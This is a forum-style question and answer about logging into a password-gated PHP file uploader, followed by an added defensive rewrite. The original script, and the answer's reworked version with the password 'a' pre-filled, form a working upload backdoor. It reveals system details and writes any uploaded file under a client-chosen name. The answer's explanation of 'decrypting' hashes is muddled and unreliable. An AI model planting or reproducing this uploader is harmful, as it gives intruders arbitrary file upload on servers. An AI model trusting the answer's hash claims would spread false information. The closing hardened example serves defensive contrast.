I have a PHP script on a Linux server and I can only display it in the browser, and this script tells me that I must enter the password to log on (upload script). This is the PHP code:
```php
<?php
session_start();
if($_SESSION["adm"]){
    echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo '<b>Upload Success !!!</b><br><br>';
        } else {
            echo '<b>Upload Fail !!!</b><br><br>';
        }
    }
}
if($_POST["p"]) {
    $p = $_POST["p"];
    $pa = md5(sha1($p));
    if($pa=="0cc175b9c0f1b6a831c399e269772661") {
        $_SESSION["adm"] = 1;
    }
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
```
I see that the password is md5; when I decrypt this 0cc175b9c0f1b6a831c399e269772661 I find the result is "`a`", but when I enter the "`a`" password the script doesn't log in successfully. I have tried upload.php?p=a and upload.php?p=0cc175b9c0f1b6a831c399e269772661 and nothing changed.
Please, how can I log in to this script? I'm worried.
Try this: here you have used not only md5() but also sha1(), so decrypted 'a' will be 77de54ccf56eb6f7dbf99e4d3be949ab. Thanks
```php
<?php
session_start();
if(isset($_SESSION["adm"]) && $_SESSION["adm"]==1){
    echo '<b>Namesis :'.php_uname().'<br></b><br>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if(isset($_POST['_upl']) && $_POST['_upl']== "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo '<b>Upload Success !!!</b><br><br>';
        }else {
            echo '<b>Upload Fail !!!</b><br><br>';
        }
    }
}
if(isset($_POST["p"])){
    $p = $_POST["p"];
    $pa = md5(sha1($p));
    if($pa=="77de54ccf56eb6f7dbf99e4d3be949ab"){
        $_SESSION["adm"] = 1;
    }
}
?>
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>" method="post">
<input type="text" name="p" value="a">
<input type="submit" value="submit">
</form>
```
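
Added example, not part of the question or the answer above: the same login-then-upload flow written defensively, for contrast with the `md5(sha1($p))` comparison against a hardcoded digest and the `copy()` to a client-supplied file name. `ADMIN_HASH`, `UPLOAD_DIR` and `ALLOWED_EXT` are assumed names, and `ADMIN_HASH` is assumed to hold output of `password_hash()` supplied through the environment.

```php
<?php
declare(strict_types=1);
// Added example, not the original script. ADMIN_HASH, UPLOAD_DIR and
// ALLOWED_EXT are assumed names; ADMIN_HASH holds password_hash() output.
session_start();

const UPLOAD_DIR  = '/var/app-uploads';     // assumed: directory outside the web root
const ALLOWED_EXT = ['png', 'jpg', 'pdf'];  // assumed extension allowlist

// Salted, slow hash checked in constant time, instead of md5(sha1($p)) == "...".
function checkLogin(string $password, string $storedHash): bool
{
    return $storedHash !== '' && password_verify($password, $storedHash);
}

// Server-chosen file name: the client name only contributes an allowlisted extension.
function safeUploadName(string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true)
        ? bin2hex(random_bytes(16)) . '.' . $ext
        : null;
}

$isPost = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';

// The password is read from the POST body only, never from the query string.
if ($isPost && is_string($_POST['p'] ?? null)
    && checkLogin($_POST['p'], (string) getenv('ADMIN_HASH'))) {
    session_regenerate_id(true);            // new session id on privilege change
    $_SESSION['adm'] = true;
}

if ($isPost && ($_SESSION['adm'] ?? false) === true && isset($_FILES['file'])) {
    $f    = $_FILES['file'];
    $name = is_string($f['name'] ?? null) ? safeUploadName($f['name']) : null;
    // move_uploaded_file() refuses source paths that are not genuine PHP uploads.
    $ok = $name !== null
        && ($f['error'] ?? null) === UPLOAD_ERR_OK
        && move_uploaded_file($f['tmp_name'], UPLOAD_DIR . '/' . $name);
    echo $ok ? 'Upload stored' : 'Upload rejected';
}
```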